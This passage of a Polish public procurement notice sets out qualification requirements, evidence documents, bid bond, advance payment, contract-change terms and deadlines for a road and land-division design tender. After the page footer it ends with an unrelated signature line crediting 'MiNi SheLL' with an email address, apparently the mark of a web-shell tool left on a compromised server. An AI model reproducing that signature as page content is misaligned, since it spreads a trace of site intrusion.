technicznej lub zawodowej<br/>2. Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże spełnianie warunków dotyczących:<br/>1) Doświadczenia Wykonawcy:<br/>Wykonanie w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o podobnym charakterze do przedmiotu zamówienia:<br/>a) Minimum 2 usługi na opracowanie projektu budowlanego i wykonawczego na budowę (w rozumieniu Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (j.t. Dz.U. z 2020 r. poz. 1333 z póżn. zm.)) drogi, którego zakres obejmował zaprojektowanie co najmniej drogi jednojezdniowej dwukierunkowej o: szerokości jezdni min. 6,0 m (2x min. 3,0 m), prędkości projektowej min Vp=50 km/h o długości min. 3,0 km w jednym odcinku i udokumentowanie, że usługi te zostały wykonane należycie,<br/>oraz<br/>b) Minimum 2 usługi na opracowanie dokumentacji geodezyjno-prawnej podziału działek o zakresie nie mniejszym niż podział 200 działek w jednym zamówieniu i udokumentowanie, że usługi te zostały wykonane należycie,<br/>Dopuszcza się wykonanie usług wymienionych w ppkt. a) i b) w jednym zamówieniu, lecz wówczas warunki muszą być spełnione dla każdej usługi odrębnie. <br/>2) Kwalifikacji zawodowych osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Dysponowanie minimum jedną osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie w zakresie projektowania, sprawdzania projektów architektoniczno-budowlanych dla każdej z niżej wymienionych specjalności:<br/>a) drogowa,<br/>b) mostowa,<br/>c) instalacyjna w zakresie sieci, instalacje i urządzenia telekomunikacyjne,<br/>d) instalacyjna w zakresie sieci, instalacje i urządzenia gazowe, wodociągowe i kanalizacyjne,<br/>e) instalacyjne w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>w zakresie dokumentacji geodezyjnej:<br/>f) posiadającą uprawnienia geodezyjne w zakresie 1 i 2.<br/>Zamawiający dopuszcza możliwość łączenia powyższych funkcji<br/><br/>Pod pojęciem dróg, Zamawiający rozumie drogi publiczne określone w ustawie z dnia 21 marca 1985 r. o drogach publicznych (Dz.U. z 2018 r. poz. 2068) lub drogi będące ich odpowiednikami w państwach Unii Europejskiej, państwach będących stronami Porozumienia Światowej Organizacji Handlu w sprawie zamówień rządowych i państwach będącymi stronami umów międzynarodowych, których stroną jest Unia Europejska.<br/>Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą Prawo budowlane z dnia 7 lipca 1994 r. art. 12 ustęp 1 ppkt. 2, ustęp 7, art.12a lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane z 1994 r., natomiast w przypadku osób, które uzyskały uprawnienia w innych krajach Unii Europejskiej a także osób z Europejskiego Obszaru Gospodarczego (tj. Królestwo Norwegii, Księstwo Lichtensteinu, Republika Islandii) i obywateli Konfederacji Szwajcarskiej posiadane uprawnienia muszą spełniać warunki określone w Ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016, poz. 65). Osoby spoza terytorium Rzeczpospolitej Polskiej muszą się legitymować decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług transgranicznych, wydanymi przez właściwe rady izby inżynierów, albo udokumentować, że zdały egzamin na uprawnienia budowlane przed właściwą Izbą.<br/>Osoba przewidziana do wykonywania usług geodezyjnych musi posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą z dn. 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz.U. z 2016 r., poz. 1629.), natomiast w przypadku osób które uzyskały uprawnienia w innych krajach UE, a także osób z Europejskiego Obszaru Gospodarczego (tj. Królestwo Norwegii, Księstwo Lichtensteinu, Republika Islandii) i obywateli Konfederacji Szwajcarskiej, posiadane uprawnienia muszą spełniać warunki określone w Ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich UE (Dz. U. 2016, poz. 65). Osoby spoza terytorium Rzeczypospolitej Polskiej muszą się legitymować decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług transgranicznych.<br/>3. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy Pzp).<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Po badaniu ofert pod kątem spełniania przesłanek odrzucenia oraz po wstępnej weryfikacji oświadczeń dotyczących spełniania warunków oraz braku podstaw do wykluczenia, Wykonawca, którego oferta zostanie najwyżej oceniona na wezwanie Zamawiającego zobowiązany będzie złożyć następujące<br/>dokumenty w terminie nie krótszym niż 5 dni od dnia wezwania:<br/>a) informacji z Krajowego Rejestru Karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem, w zakresie:<br/>- art. 108 ust. 1 pkt. 1 i 2 ustawy Pzp,<br/>- art. 108 ust. 1 pkt.4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz.U. 2020 r. poz. 1076 i 1086) z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór załącznik F do SWZ);<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu (wzór załącznik G do SWZ), o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstawy wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy Pzp;<br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy Pzp<br/>d) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. a), składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania w zakresie określonym w pkt a), wystawionych nie wcześniej niż 6 miesięcy przed jego złożeniem,<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. d), lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy, wystawionym nie wcześniej niż 6 miesięcy przed jego złożeniem;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz usług, o których mowa w pkt. VIII .2.1) SWZ wykonanych w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, zakresu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy;<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami wykaz winien dotyczyć usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b) wykazu osób, o których mowa w pkt. VIII.2.2) SWZ, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z imionami i nazwiskami tych osób, wskazaniem uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Uwaga: <br/>W przypadku wskazania w: „Formularzu oferty" doświadczenia zawodowego osoby na stanowisku projektant branży drogowej, wykaz osób w odniesieniu do tej osoby musi być tożsamy z drukiem oferty. <br/>Szczegółowy opis dotyczący podmiotowych środków zawarty jest w pkt. IX SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 5000,00 zł, (słownie: pięć tysięcy złotych )<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie z art. 97, ust. 7 ustawy Prawo zamówień publicznych:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310,836 i 1572).<br/>Pozostałe wymagania odnośnie wnoszenia i zwrotu wadium określono w pkt. XXIII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>a) oświadczenie, o którym mowa w pkt. IX.2 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w pkt VIII 4 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów Załącznika B do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. IX.6 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w pkt. IX.6.1) SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy Wykazuje/-ą spełnienie warunku<br/>- w pkt. IX.6.2) SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Na pisemny wniosek Wykonawcy Zamawiający udzieli Wykonawcy jednorazowej zaliczki na poczet wykonania przedmiotu Umowy, w wysokości 5% wynagrodzenia brutto Wykonawcy, o którym mowa w § 5 ust. 1-2 wzoru umowy (wartość maksymalna) . <br/>Wykonawca przed otrzymaniem zaliczki wniesie Zamawiającemu zabezpieczenie zwrotu zaliczki w formie gwarancji bankowej lub ubezpieczeniowej, w wysokości 100% wysokości zaliczki.<br/>Pozostałe wymagania odnośnie udzielenia zaliczki i wnoszenia jego zabezpieczenia przez Wykonawcę określono we wzorze/projekcie umowy (Załącznik J do SWZ). <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający zgodnie z art. 455 ust 1 pkt 1) ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmiany umowy polegających na: <br/>1)	zmianie terminu wykonania umowy w przypadku, gdy przedłużeniu uległy procedury na etapie uzyskiwania uzgodnień, opinii, postanowień lub decyzji administracyjnych. <br/>Wydłużenie terminu wykonania umowy nastąpi tylko w przypadku uzasadnionego i udokumentowanego wystąpienia wydłużenia czasu uzyskiwania ww. materiałów o ilość dni ponad terminy określone w Kodeksie Postępowania Administracyjnego i innych przepisach prawa; <br/>2)	zmianie wynagrodzenia Umowy w przypadku zmiany:<br/>a) stawki podatku od towarów i usług; <br/>b)	minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę; <br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki na ubezpieczenie społeczne lub ubezpieczenia zdrowotne, <br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz.U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572), <br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <br/>3)	zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SWZ. W przypadku projektanta branży drogowej wskazana osoba powinna posiadać doświadczenie punktowane nie gorzej niż osoba wskazana w ofercie (zgodnie z kryteriami oceny ofert); <br/>4)	zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca powołuje się, na zasadach określonych w art. 118 ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia oraz nie zachodzą wobec podwykonawcy podstawy wykluczenia, które zostały przewidziane względem Wykonawcy; <br/>5)	rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powołuje się, na zasadach określonych w art. 118 ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia. <br/>Wyżej wymienione przypadki dopuszczające zmianę Umowy nie stanowią zobowiązania Stron do dokonania takiej zmiany. <br/>Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej. <br/>Szczegółowy opis rodzaju i zakresu zmian oraz warunki wprowadzenia zmian<br/>zawiera § 7 i § 10 wzoru/projektu umowy stanowiącej Załącznik J do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy zakupowej pod adresem https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-05 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-03</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com